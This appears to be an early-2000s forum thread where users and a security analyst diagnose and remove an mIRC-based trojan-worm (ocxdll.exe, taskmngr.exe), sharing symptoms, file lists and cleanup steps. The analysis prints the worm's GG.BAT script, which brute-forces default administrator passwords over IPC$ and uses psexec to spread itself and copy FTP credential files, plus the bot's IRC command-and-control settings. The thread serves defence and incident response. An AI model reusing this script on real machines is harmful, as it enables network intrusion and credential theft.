Good job! This is an IRC Trojan that uses Mirc as it's engine. dll32nt.hlp is the actual virus. Delete the files and update your virus definition files.

Dear Nathan Ellis,

We have analyzed your submission. The following is a report of our findings for each file you have submitted:

filename: E:\Documents and Settings\nellis\Desktop\nt32.ini
machine:
result: See the developer notes

filename: E:\Documents and Settings\nellis\Desktop\DLL32NT.HLP
machine:
result: This file is infected with IRC Trojan

filename: E:\Documents and Settings\nellis\Desktop\TASKMNGR.EXE
machine:
result: See the developer notes

Developer notes:
E:\Documents and Settings\nellis\Desktop\nt32.ini does not appear to contain malicious code. E:\Documents and Settings\nellis\Desktop\DLL32NT.HLP is non-repairable threat. It is detected by NAV after an update using the attached definition updater. Please delete this file and replace it if neccessary. E:\Documents and Settings\nellis\Desktop\TASKMNGR.EXE contains no malicious code although it can be used for malicious purposes. It is safe to delete this file.

The attached file is a self extracting zip containing updated virus definitions for Norton AntiVirus to successfully detect and repair
this virus.

Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.

--
This message was generated by Symantec Security Response automation.

For USA:
For electronic support options, Symantec provides On-Line Services at
http://www.symantec.com/techsupp/

Although, the symptoms I experienced were the following...some windows when opened would throw this error "HideWindow - Error, Window Not Found!". The windows receiving the error were when I opened Internet Explorer, Search - Help, Windows Explorer, Add/Remove Programs, and My Documents or when any website opened a new window.

In addition, I saw on a Microsoft developers newsgroup that others are affected and were receiving the same error as myself "HideWindows-Error" - none of the people, of course, realized this was the result of a virus.

Three other symptoms that I experienced: 1) a very, very tiny "MIRC" icon displayed on bootup and quickly disappeared, 2) a command window appeared during bootup in my active apps very briefly 'secedit.exe' - and found the sec*.bat file which was starting the command, 3) everytime I shutdown my machine, taskmngr.exe would popup for 'end task' - of course, I thought this was really Task Manager until scanning hardrive and finding the MIRC-Taskmngr.exe.

Question - any idea yet as to how this virus spreads? and exactly what damages it causes?

++
This is a trojan using SMB over TCP attack, using port 445. It looked for vulnerability in weak administrator id and passwords on the local Windows 2000 systems.
++

One of my clients also got infected with ocxdll.exe virus. This occurred back in 8/28/2002 at 3am. After some detailed analysis, I have determined that it was a Trojan, deleted the detected registry entries, delete the infected files, tighten the administrator ID and password, restored the security policy by running "secedit.exe /configure" (from Microsoft) to restore the security policy (If they have a backup .sdb file, then just reapply the security policy would fix this part), add users back to local. The cause is bad security (admin ID and passwords), and a backdoor to drop the ocxdll.exe.

Effected systems:
++
- Windows 2000. Security policies alteration was ONLY for Windows 2000
- Windows NT - might be infected, but will not distribute or change security policies.

What did it do?
++
1. hide all programs it ran.
2. open backdoor, port 60609
3. Run mIRC client with random usernames listed in mdm.scr with more random characters
4. It ran the bot (robot) scripts in the following order, which means they contained malicious automated instructions.

[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.

5. Replace security policy settings using Microsoft security editor (SecEdit.exe /configure) command and reset the security policy to default settings, and replace security settings in the TFT8675. This is done in quiet mode.
6. It scans for 20 IP's and then start running "GG.BAT", which is the real program that started the hacking.
7. It tries to hack into the system using the following user ID and password. If you don't have these user id and passwords, maybe you are just infected with 1 system, and it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator id and passwords, then probably these systems were hacked successfully. It copied the Trojan OCXDLL.EXE to the compromised systems. If file were there, copy it anyway, and do it quietly. (using psexec.exe -c -f -d)
9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which extracted the 17 files that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and "c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory. (maybe get the configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc client.
12. The scripts were kicked in to HIDE the mirc window, so you can ONLY see it in the process. You will see "taskmngr.exe" (NOT taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker. Either attempt failed or attempt successful.
++
Disclaimer: The irc bot scripts have not fully analyzed. This is what I understood so far. The removal instructions WILL remove the trojan.
++

Impact:
++
This may be a random attack. However, there is a file, ncp.exe involved, which is the NetCat program. This program allows the hackers to gain full control to your system. Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data were lost.
2. Worst-case scenario is that they have controlled your system and implemented something new that are not yet detected.
3. The hacker has captured your IP address and knows that you were vulnerable because the Trojan actually reported back to him/her.
++

How to remove the Trojan:
++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe and dll16.ini (created when running mirc.exe)

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

**
**NOTE:
seced.bat is a decoy. This file was never used. The real instruction for updating the configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never used.

**

2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run, remove "taskmngr.exe" (this starts mirc client program during the windows startup)
3. Change the LOCAL Administrator password on ALL Systems! Make sure they are strong passwords! Use mix of Uppercase, Lowercase, numbers, and non-alphanumeric, i.e. _,+,=,), ...
4. If possible, change Administrator login ID to a different user_id. This will stop the initial user_id guessing. (This will not stop the more sophisticated hackers)
5. Restore the default security policy settings by typing "secedit /configure C:\WINNT\security\Database\ secedit.sdb"
6. Goto start -> programs -> administrative tools -> Local Security Policy, click on "User Rights Assignments", and add users and groups back into the policy. "Access this computer from the network". The default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[ SYSTEM_NAME]

Additional Recommendation:
--
1. Tighten your Firewall and ANY all unwanted traffic from accessing ports, BOTH inside to outside, and outside to inside.
2. Rename your administrator user id to something else, and create a user id called "Administrator" with NO GROUPS. This will allow you to monitor anyone trying to use the "Administrator" login.
3. Setup security log, at minimum, log successful and failed Logon/Logoff., and monitor the event logs.
++

More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run, remove "taskmngr.exe" (this starts mirc client program during the windows startup)

When MIRC client started running, it runs the scripts in dll32nt.hlp, which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+ tftp8675 /quiet". This meant "configure your system setting with the default security policy, plus the additional settings in tftp8675". It basically removed many security restrictions, remove all audits for the systems, and of course remove all users in the "Local Users allowed from the net".
List from TFTP8675:
--
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
--

OCXDLL.EXE is a self-extracted file that included 17 files. It is a Trojan and it's a worm. In the dll32nt.hlp, it has an instruction to do IP scan, and store the 20 IP address it found. Mostly likely it scanned the subnet and file server that were connected to the victim systems at that time. Then it has an instruction at the end to run GG.BAT, which is the instruction to attack the 20 IP's that just found.

Here are the files that were extracted from ocxdll.exe:
++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++

Here is the GG.BAT text:
--
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
--

You probably have seen a strange user with weird SID that was added by the trojan in the "Logon Locally" policy. Remove the user. The SID there does NOT mean the trojan created a user. It was in the security template on TFTP8675 file.

Here is the steps to restore the original default microsoft template from Edward Alfert
==
NOW THE FUN PART..

1) use the backup security database template to restore the system to its
original microsoft defaults. (NOTE...if you upgrade from a previous OS,
this default may not be the default you are used to)...

cd %windir%\security\templates

Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log
/verbose

2) copy /winnt/security/database/secedit.sdb to
/winnt/security/database/secedit-check.sdb

you need to do this because you can't run step #3 against the original
secedit.sdb

3) click on start, run, type mmc and click ok

4) click Console menu, then Add/Remove Snap-In

5) click Add, then double click on "Security and Configuration Analysis" and
"Security Templates", then click close, and ok.

6) right click on "security and configuration analysis" and click on "open
database"... browse to /winnt/security/database/secedit-check.sdb and
select it.

7) right click on "security and configuration analysis" and seclect
"analyzie computer now"

8) browse throught the directory structure and you will see that the
computer is currently configured differently..

Make changes as appropriate for your environment.

For example, a very important option that is probably missing (as caused by
the trojan) is that nobody is allowed to logon to the computer via the
network).

go to "security and configuration analisys"... then "local policy"... then
"user rights assignment"...

The first line... "Access this computer from the network" doesn list any
user or group!... this is definitely NOT the default... the default is to
include the following "Backup Operators, Power users, users,
administrators, everyone"..

Add these, and everything should now be fixed with "workgroup" networking.

NVIDIA - New video card installed
Putty - New shell application
Maxis - Sims and Sims Vacation
Adobe - Acrobat Reader
Norton - New Virus Definitions
Microsoft Games - Zone files for Asheron's Call
Microsoft Games - .exe for Asheron's Call 2 Beta
1.0 - A folder containing a hell of a lot of files for Microsoft's "Cubis".

The only thing that raises my eyebrow is the 1.0 file. It contains over 200 various small files and 2 zips, including "cubis.jar-4c1275de-16bce078" and "GroopzApplet.jar-66d0be0a-30a89ef9". After unzipping GroopzApplet.jar-66d0be0a-30a89ef9, I found a 3rd zip, "GroopzApplet.jar-77e7758b-2746df5d".

So, I did a little search and found that this Groopz thing is toted as :

you can take your web site visitors on guided tours by "pushing" web pages to your visitor’s browser with the Groopz Operator program. You can simultaneously chat and push pages, making the live tours truly interactive, personal, and effective.

You can also push any web-accessible file, including sounds/MP3s, pictures, MS Word documents, PDF documents, and ZIP files.

In addition, there might be some adware that was installed on your system when you surf the web. You want to make sure you get rid of these adwares because it might open ports on your system and send info on your system back to the vendors. You can detect these adware by using another tool called ad-aware. You can download the tool from http://www.lavasoftusa.com/

Hope this helps.

Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log
/verbose

... I get this message after the process is done:

"Task is completed. Some files in the configuration are not found on thsi system so security cannot be set/queried. It's ok to ignore. See log C:\WINNT\SECURITY\TEMPLA~`\basicwk.log for detail info."

(btw, basicwk.log is 628KB, so I'm not sure what to look for in there... ^^;;)

And then, when I get to step 6:

6) right click on "security and configuration analysis" and click on "open
database"... browse to /winnt/security/database/secedit-check.sdb and
select it.

I can't find secedit-check.sdb. (I do find secedit.sdb though). Even if I do a search on all my drives I still can't find secedit-check.sdb. I'm guessing the error message from step 1 has something to do with it. Well, any suggestions? ^_^

I did posted the updated part 1 of the analysis, and a follow-up:
Part 1:
http://groups.google.com/groups?q=solution+irc+virus&hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209050049.24860609%40posting.google.com&rnum=4

Part 2:
http://groups.google.com/groups?dq=&start=25&hl=en&lr=&ie=UTF-8&oe=UTF-8&group=microsoft.public.scripting.virus.discussion&selm=bf0f8e77.0209080706.7f395b0c%40posting.google.com

I like to stress that the Permission/Rights settings are more critical if your servers were infected. Make sure you RESET proper rights to the users, groups so systems, backups, other applications will run properly. If not possible, or if your system is working weird, I suggest re-building the server because you don't want to take any chances, especially if it's a critical system.

Here is the latest update:
1. I did not see any Anti-virus software vendor posting any alert, or give a name to this virus/trojan/malware, but they did identify some, but not all of these files in their later virus definition files.

2. Microsoft posted their analysis on the Microsoft Knowledge Base Article - Q328691, but info is not all correct. This is in the part 2 of my analysis.

3. One Microsoft PSS Security Specialist contacted me via email after reading the part 2 of my analysis, and I gave them a copy of the trojan/virus I analyzed. I have not heard back from him for the last couple days. Due to the scope of the infection, I hope they release some type of recommendation and/or alert to everyone that were infected because this trojan involved many 3rd party tools, hacker programs, and possibly a distributed Denial of Service program.

If possible, please send me an email at aladin168@hotmail.com and I like to do a quick survey to kind of identify the scope of this outbreak. All responses will remain anonymous. I promise. If you are not comfortable, please reply anonymously in this discussion group.

Thanks so much for you input.

Survey:
++
What's your infected Operating System?
What Service Packs were installed (if any)?
What's the time of the infection (approximate)?
What actions have you taken?
Did you reset the password for your administrator accounts?
Did you ever see ocxdll.exe as an infected file?
Did you ever see ncp.exe? If not, can you please do a search? It's a hacker's program.
Did you ever see mt.exe? A possible dDos client.
What Anti-virus software do you use, and did it identified irc/flood trojans?
Did you see the virus coming back and alarmed by your Anti-virus program?
++

Again, this trojan did spread by itself. The only protection is to re-set the administrator password to something hard to guess. If there is still a trojan out there that has not yet being removed, it will still actively find vulnerable systems to hack itself in.

I won't be surprised if there is a variant of this trojan in the future, so make sure you do some type of security assessment.

Additional Recommendation:
shields-up (https://grc.com/x/ne.dll?bh0bkyd2) is the most basic test you can do to test your network connection to the Internet. Go to that website and click on "Probe my ports" and it will give you some valuable results. If Shields-up test results showany open ports on your system, then you better install a FREE firewall like zone alarm (www.zonealarm.com) then go to Shields-up site and test it again. Unless you block the traffic from coming in, you are still vulnerable.

The most disturbing thing is that I found a file called psXXX.XXX.XXX.XXX.txt (X - is my IP no) with approx the same time and date, and in the same directory, as the other modified files.

This file contained my mail address and password, the URL and user name for my internet bank account and various other login info.

Does anyone else have this file? If it's linked to the worm, then whoever planted it, may also have this information.

That means talking with your ISP and changing your connection password.

That means changing the password for your online banking, your password for Paypal, and any other online services you care about.

The information you mentioned should never under normal circumstances be placed in a single file. That was collected by some program. It may or may not have been uploaded to the web by the worm.

Besides changing all of the passwords on all of your accounts, make sure you change the Windows Administrator account to something that's hard to guess.

Besides that, here are 4 FREE software that will help you fight the Trojan and intrusions. Make sure you get the latest update regularly:

1. Make sure you have the latest Anti-Virus definitions that downloaded from your anti-virus software vendor. If you don't have one, here is a free one: http://www.grisoft.com

2. Make sure you get an Anti-Trojan software on top of the Anti-Virus software. Many Anti-Virus software does not detect Trojans and Hacker software that was installed during an intrusions. Anti-Virus software does not detect hacker software because it could be used ligitimately by security professionals... A free and Great one is Swat-IT by Lockdown Corp: http://lockdowncorp.com/bots/downloadswatit.html

3. Get Ad-Aware software, which is for removing the advertising software that web advertisers installed on your systems without your acknoledgement just by surfing on the Web... This is a free software too: http://www.ad-aware.com

4. Get a Firewall for your computers if you have not get one. Here is a very simple to use FREE firewall software: http://www.zonealarm.com

Good luck!

What I am not 100% sure about though is if I had fixed the secedit file correctly. I followed the instructions posted above, but I didnt see anything different from what was standing. All my auditing stuff was still set as disabled and something I had changed in the original secedit file was still standing, which should have been overwritten when I had imported the files using snap in, in the mmc program.

Any additional help on the secedit functionionality and manual edits that I can do would be appreicated. I am really not a pro in this security function, so not sure what I need to actually set.

Thanx again for this excellent thread.

2.) Network Crack Wizard 99 - C:\WINNT\system32\NCP.EXE

3.) GT Bot M HideWindow - C:\WINNT\system32\WINHP32.EXE

--

I sourced my trojan to some games I downloaded from Kazaa for the kids, it was either a counting game or a compilation of five arcade games that were zipped up. i thought I took necessary precautions by checking them with my AV, but they did not show up at that time.

I also had the file ps**.***.***.txt

All it seemed to contact were my pop3 addresses
and email password (since changed). the odd thing was that one of the pop3 addresses were spelt wrong, exactly as I had spelt wrong when I first typed them in, rather than when the trojan installed. (Odd..) I assume from this that the file was not pulling information directly from Outlook but from an older file with my previous mistake.

I didn't get a Mirc logo or a hide window error, do I assume from the posts above that there are variants of the same trojan? If so, do all of the instructions that Kyle gave still apply?

The dll16.ini file contained this..

n0=%server rpc.bsd.st
n1=%timeout 10
n2=%gnick.tmp kitskool
n3=%chan ###orlbe6###
n4=%pstor ps.txt
n5=%pass  broken !
n6=%pass8 hey there?
n7=%master ionix@ionix.users.undernet.org

These files were to be deleted as per Kyles instructions :

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

My system does not contain:
gg.bat
httpsearch.ini or httpsear.ini
mdm.exe
mt.exe
ncp.exe
v.exe

David,
If you have ocxdll.exe, please zip it up and send it to me at kyle@kylelai.com and maybe I can tell you if the attackers modified the filenames.

Can you guys tell me when you get affacted by this virus? I heard there was a series of attacks around 10/23... Can you guys confirm this?

Good Luck,
/Kyle

Survey:
--
1. What's your infected Operating System?
2. What Service Packs were installed (if any)?
3. What's the time of the infection (approximate)?
4. What actions have you taken?
5. Did you reset the password for your administrator accounts?
6. Did you ever see ocxdll.exe as an infected file?
7. Did you ever see ncp.exe? If not, can you please do a search? It's a hacker's program.
8. Did you ever see mt.exe? A possible dDos client.
9. What Anti-virus software do you use, and did it identified irc/flood trojans?
10. Did you see the virus coming back and alarmed by your Anti-virus program?
--

Thank you very much for your help!

Cheers

They were easily removed, but my folder was not deletable because of a sharing violation, and the registry entry was removed as well.

I'm about to reboot my computer and hope that nothing will be messed up.

The only reason I even began looking into all of this was because random ads started appearing on my screen for diplomas and crap -- the kind of stuff you find in spam e-mails. It was an unidentifiable program in a window, and once you closed it, it just went away. Then I found this winmngr.exe file in my task manager and thought it was it. When I searched online, I found this thread.

I'm just telling you my train of events, maybe others have experienced a similar train? Maybe the ads are related to this worm?

E-mail me with the subject line "TASKMNGR" at mikepehlivan@rogers.com if you have any information for me or if I can provide any for you.

Thanks,

If you were hit by this virus/Trojan, and variants of the original virus/Trojan, YOU BETTER CHANGE YOUR PASSWORDS, and make sure it is something harder to guess. DEFINITELY NOT BLANK!

I heard the new variants might get your user ID and passwords and credit card info if they are on the computer, so beware!

This thread is getting long, and if you missed the link to my original analysis, they are at:
Part1:
http://groups.google.com/groups?hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209050049.24860609%40posting.google.com

Part2:
http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209080706.7f395b0c%40posting.google.com

They might not apply to the latest variants, but from what I have seen so far, the malicious files are listed below:

ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
--
New Files:
--
BACKUP.BAT
NT32.INI
PSTOR.EXE
WINHP32.EXE
DDSHARE.EXE

If you are attacked more than once, that means your system is still vulnerable.

I can't stress enough... Make sure you:
1. Get the 4 FREE anti-virus, firewall, anti-trojan software from my posting on 09/24/02 above.
2. Install and Run your Anti-Virus and clean the viruses. Schedule it to run every day.
3. Install and Run SWAT-IT and clean the Trojans. Run it once a week.
4. Install Personal Firewall (zonealarm) or a hardware firewall with Router for DSL or Broadband.
5. Change your ADMINISTRATOR password
6. Change all passwords for your user accounts. The attacker might have gotten a copy of UserIds and Passwords already.

Good Luck!
/Kyle

I found that Rhino (some ftp program) was being installed on it's own on my comp. Previously, in last week, Norton antivir did detect ICR trojan "c:\winnt\fonts\*.INS" were the infected (and quarantined) files. Recently I did install Quicktime application. I wonder there is any conection observed by few. I do have Windows2000Pr and administrator with no passwd. I wonder if I am further at any risk.

Is Zonealarm a good firewall. I am serious about installing it!

If you don't have a personal firewall, you probably should consider installing it. You can learn more from their website, www.zonealarm.com

Here's a list of the files I found.
dll16.ini
dll32nt.hlp
nt32.ini
ocxdll.exe
task32.exe
xvpll.hlp

The registry entry above refers to task32.exe now instead of taskmngr.exe.

Can you please let us know when you first noticed the infection? and what system was infected?

Norton Anti-virus found this on my m/c yesterday. It did not identify all the files from Kyle's message of 11/07 but it at least alerted me to the problem. I followed Kyle's (Thanks) instructions for removing and have removed all the files mentioned above and restored user rights assignment for the Network. I no longer get the secedit cmd window on bootup. When I scan again for viruses, NAV finds none, however realtime protection finds the following:-

A0095786.BAT IRC Trojan C:\System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\RP297\ Infected

and:-

_REGISTRY_USER_.DEFAULT IRC.Mimic C:\System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\RP298\snapshot\ Infected

When I try to access the c:\system volume information directory, I get access denied even though I am logged in as an administrator.

Anyone else seen this? Any ideas how to proceed?

Thanks,

If you or anyone still have a copy of the trojan that spawned task32.exe, please send it to kyle@kylelai.com. I'd like to keep track of the variants of this virus. It seems to spread pretty fast. I know 3 variants so far. The hackers definitely know that people are not patched, either don't know, or don't have time, or don't want to...

To remove Trojan from the registry, you need to check registry entries at the following locations: (for complete info on where Trojan might reside in your computer, check out http://www.kylelai.com/trojan_paper.htm)

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

The ocxdll.exe was detected as blank by NAV. The other files backup.bat, dll32.hlp, xvpll.hlp were detected as IRC Trojan and default, _registry_user_.default A0095786.bat, A0095787.hlp and A0095789.hlp were detected as IRC MIMIC. Other files on your list such as taskmngr.exe which were on my machine (and since removed) were never detected by NAV. I can send you the NAV log file if you like.

NAV was not installed correctly before I started to notice the secedit command window. I noticed it happening on October 28th. The only thing I had downloaded on that day, were a VPN client attached to an email sent to me from Work. I am assuming that was clean as it would have been scanned by work and I have not heard of anyone else there with the same problem. I had done a Windows update 2 days before and it is possible I just did not notice it then. Anyway, it was after a few days that I took the time to get NAV working properly and it found it (after a live update) on the first manual scan.

I no longer get the secedit cmd window and NAV does not detect any virus on a manual scan, it only detects it in the c:\system volume information directory on a realtime scan. I can't access that folder (it is hidden by default, but I changed that), I get Access denied although I am logged in as an Admin.

The last infected file NAV found was today:-

20/11/2002 15:40 _REGISTRY_USER_.DEFAULT IRC.Mimic File Quarantined DOODLES mhall C:\System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\RP301\snapshot\ Infected Quarantine Clean virus from file Quarantine infected file Realtime scan

It is now finding one of these per day, exactly the same but with RPxxx being incremented by one each time. I am deleting them everytime NAV finds one. I believe these are backup files used to restore Windows XP. When I search the registry for the same GUID, it finds it in 4 places:-

HKEY_LOCAL_MACHINE\System\Controlset003\Control\BackupRestore\FilesNotToBackup\System Restore. The value is \System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\* /s

HKEY_LOCAL_MACHINE\System\Controlset003\Services\sr\parameters\MachineGUID with the value {09EB170D-7904-4451-AD52-778A1BB0050C}

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\BackupRestore\FilesNotToBackup\System Restore, with the value \System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\* /s

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\sr\parameters\MachineGUID, with the value {09EB170D-7904-4451-AD52-778A1BB0050C}

As far as cleaning the registry as per your post, I only found taskmngr.exe in [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] and deleted it. There is another key in there called SSCFBTN.exe - it may not have anything to do with anything but I have no idea what it is, the rest of the entries seem OK.

In [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] I have MSMSGS with the value "C:\Program Files\Messenger\msmsgs.exe" /background which I am assuming is just MSN Messenger, but then again, I would have assumed taskmngr.exe was just the task manager.

Sorry for the detail and some of it is probably irelevant. If it helps or if you have any more information on how I might get rid of the virus in c:\system volume information issue, let me know.

That's about all I got for now.

When did you get infected?
What is your operating system?
What service pack level are you at before and after you are infected?
What have you done after you were infected?
How did you attempt to remove every virus files, either successful or not?

If you have the original ocxdll.exe, or the original infected files, please zip it up as ocxdll.exe.txt, and zip it up and send them to me. I'm interested in seeing that has changed from the first variant. Please send it to kyle@kylelai.com

Thanks,
/Kyle

http://www.astalavista.com/trojans/library/trojans/analysis/mirc_trojan_analysis.shtml

It includes the summary from my webpage (www.kylelai.com/mIRC_Virus_Analysis.htm) as well. This analysis was done back in late August and early September on the original version of the trojan.

Several new variants have been reported in this discussion group, and I am trying to keep my webpage up to date.

Kyle,

I ran NAV on the directory now that I got rights and it found a0095788.exe which was a compressed file containing backup.bat, dll32.hlp and xvpll.hlp. The a00 name is just an XP backup naming convention, I'm 90% certain it is the original ocxdll.exe. I have renamed it a0095788.exe.txt and sent it to you.

What seems strange is that it also found infected _registry_user_.default files in backup folders previous to this one. The exe above was found in RP297, but the infected _registry_user_.default was found back in every folder since RP285. Also strange is that NAV never found these before. Maybe it was the access rights issue.

As Ryan says, XP is creating an infected backup of _registry_user_.default every day which I think is the HKEY_USERS/.default folder in the registry. I had a look in there and found HKEY_USERS/.default/software/Mirc/dateUsed with a value of 1035660900. It could be innocent. I no longer have Mirc installed on my machine.

In any case, after clearing the infected files from the backup folders, I am going to restore back to a point before 26/10 which is when I think this started. I'll let you know how I get on.

My computer is infected with a virus that I cannot delete or clean. Whenever I try to access any website, I get the message "Hide Window Error" window not found.

Is there anyone out there that can explain in layman terms what I need to do in order to get rid of this virus?

In terms of your problem, there might be a virus calling the hidewindow program (part of the virus) trying to hide the window of a program. However, the name of the window was either misspelled when it called hidewindow, or the program the virus tried to hide has been terminated. Since hidewindow program could not find the right window to hide, it generated an error message, and that was what you saw.

Hidewindow program is usually used to hide the GUI of programs specified in its configuration (parameters). Once a program is successfully hidden by hidewindow, you will not see the GUI, but you can see its process in the task manager. For example, if the hidewindow program is specified to hide your Windows Explorer, and if it's successful when you starts Explorer, there might be a flash of Explorer, then you will not find Explorer anywhere. You can only see its process in the process list in the task manager.

I am interested in analyzing different variants.

I am planning to write a part3 of my ocxdll.exe analysis series discussing about the variants.

Did you have any luck with the System Restore? I cleared out all the files (you can just switch off system restore to do that). NAV detects no virus on a manual scan, but as soon as I switch system restore back on, realtime protection finds it in _registry_user_.default that system restore creates.

I want to thank each of you for providing such great information concerning this trojan. Without your help, I would have been stuck. Went and did all your suggestions and I feel confident that my computer should be ready to roll now.

To all other users- if you are on a home LAN, even behind a router, you might download and install Zone Alarm as if you ever open ports for gaming you will get hit with people trying to get onto your computer and as there have been multiple articles written XP and 2000pro are open to attacks in the security systems.

She got tipped off when the local Anti-Virus program detected an infected file and fortunately disconnected and brought it to me.

The Anti-Virus Software (we use InoculateIT by CA) was next to useless for detecting this stuff. It picked up the one infected file (AdobeS.exe) which I think was part of the payload placed on the laptop but missed alot of others that I know are also a problem.

Anyway this definately seems to be a varient of the above Trojan... the main difference being some of the file names. The main file it has set to run automaticaly on startup in the registry is syscfg32.exe They also downloaded a program called screwed.exe to the users laptop. I haven't researched what it does yet.. but I'm sure it's not pleasant. Going to do a low level format, a complete system wipe and restore.

By the way whoever did this left files indicating the IRC channels & FTP servers they were using for this exploit, including thier own passwords in plain text. Would be happy to e-mail copies of those along with anything else thought would be helpfull in researching the issue to anyone who was interested.

If you have the original AdobeS and AdobeA.exe, please send it to me at kyle@kylelai.com. I just want to verify the contents from different sources.

Thanks,
/Kyle

Kyle Lai, CISSP, CISA
www.kylelai.com
kyle@kylelai.com

Finding this thread has been a miracle for me. I searched for several of the files that Kyle initially listed above and found each one that I searched for - kill, ocxdll, dll16 etc

My big question is, I really don't have the confidence to go into my system to make all the changes that it seems I must do in order to rid my system of this scourge. I will have a professional come over to help, but in the meantime I would certainly like to at least delete the known trojan files that I'm locating. If I were to simply delete the files (effectively, performing only step #1 out of 6 steps), will I be doing any good? Or worse, will I end up damaging my system? I'm sorry if the question seems naive. Any input would be greatly, greatly appreciated.

This trojan also guessed administrator and user id and passwords like ocxdll.exe / taskmngr.exe.

I have not yet analyze the Lioten trojan so I am not sure if it is associated with ocxdll.exe in any way. Stay tune.

Thank you so much for getting back to me. I am using Windows 2000. I update McAfee each week but it just can't seem to delete these files. I installed AVG and it's the same deal - it can detect but it can't delete.

I've been using Norton Firewall for the last few years. I can only imagine that I got infected during a brief time where I disabled the firewall because I was having trouble with a download and thought the program was the cause. In any case, I'm certain that the Trojan has mutilated the Firewall because, while I still get prompts about ActiveX controls etc, the Firewall has not warned me of an "attack" in months, whereas it used to issue these warnings on a daily basis!

I've got Anti-Trojan installed. For some reason, when I tried to download Swat It, something went amiss and the program when opens "partially" for lack of a better way of putting it.

Back to the initial question, if I were to simply delete the OCXDLL-related files without doing the other steps, would I be making a terrible mistake or will it at least get rid of these files for good?

Thanks again for you help. You have no idea how much I appreciate this!

